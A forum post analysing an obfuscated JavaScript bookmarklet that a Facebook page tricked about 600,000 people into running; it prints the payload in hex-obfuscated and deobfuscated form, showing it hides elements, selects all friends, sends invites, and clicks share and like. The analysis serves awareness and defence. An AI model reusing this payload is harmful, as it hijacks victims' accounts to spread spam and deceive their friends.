- Code: Select all
javascript:(function(){a='app107489592636080_qjPdbG';b='app107489592636080_asAbCy';hWBkWd='app107489592636080_hWBkWd';RsApSf='app107489592636080_RsApSf';CXyYOD='app107489592636080_CXyYOD';var _0xa049=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x73\x6C\x69\x6E\x6B","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xa049[2]](CXyYOD)[_0xa049[1]][_0xa049[0]]=_0xa049[3];d[_0xa049[2]](a)[_0xa049[4]]=d[_0xa049[2]](b)[_0xa049[5]];d[_0xa049[2]](_0xa049[7])[_0xa049[6]]();setTimeout(function (){fs[_0xa049[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xa049[11]](_0xa049[9],_0xa049[10]);setTimeout(function (){d[_0xa049[2]](_0xa049[12])[_0xa049[6]]();setTimeout(function (){inp=document[_0xa049[14]](_0xa049[13]);for(i in inp){if(inp[i][_0xa049[5]]==_0xa049[15]){inp[i][_0xa049[6]]();} ;} ;setTimeout(function (){d[_0xa049[2]](_0xa049[16])[_0xa049[6]]();d[_0xa049[2]](RsApSf)[_0xa049[4]]=d[_0xa049[2]](hWBkWd)[_0xa049[5]];} ,5000);} ,3000);} ,3000);} ,5000);})();
Obfuscated Javascript injection. So I whipped up a simple app to translate the hexcode; there was still a lot of obfuscation involving arrays and whatnot. After sorting through all of that, I got the following:
- Code: Select all
javascript
:(
function()
{
document[getElementById](app107489592636080_ERqmQz)[style][visibility]=hidden;
document[getElementById](app107489592636080_pxnzBW)[innerHTML]=document[getElementById](app107489592636080_FqafMk)[value];
document[getElementById](suggest)[click]();
setTimeout
(
function ()
{
fs[select_all]();
}
,5000
);
setTimeout
(
function ()
{
SocialGraphManager[submitDialog](sgm_invite_form,/ajax/social_graph/invite_dialog.php);
setTimeout
(
function ()
{
document[getElementById](slink)[click]();
setTimeout
(
function ()
{
inp=document[getElementsByTagName](input);
for(i in inp)
{
if( inp[i][value]==share )
{
inp[i][click]();
}
;}
;
setTimeout
(
function ()
{
document[getElementById](likeme)[click]();
document[getElementById](app107489592636080_tsypQz)[innerHTML]=document[getElementById](app107489592636080_AKgead)[value];}
,5000
);
}
,3000
);
}
,3000
);
}
,5000
);
}
)();
My preliminary guess is that this is just a simple injection that causes users to "Like" the page and "Suggest" it to friends. I'm not particularly familiar with the exact constructs that Facebook uses (referring to the "app107489592636080_pxnzBW" garbage and whatnot), so if anyone wants to clarify exactly what this code does that would be cool.
Does anyone have any thoughts on this? The page has since been deleted but it had nearly 600,000 fans. I'm personally thinking that this code could easily be modified to send user's cookies to a remote server that would then hijack the user's session ( There is at least one tool available for this purpose, found here. ). If that's the case, does anyone else think this would be worthy of Facebook addressing? I know GMail sessions used to be easily hijacked, and I'm pretty sure Google fixed that by adding some form of server-side IP address verification.
My main concern is that nearly 600K people were fooled into injecting javascript into their own browsers.
EDIT: I looked at this some more. Turns out you couldn't use JS to capture the necessary cookies to hijack a FB session on most browsers, thanks to FB's use of the HttpOnly flag. But still.
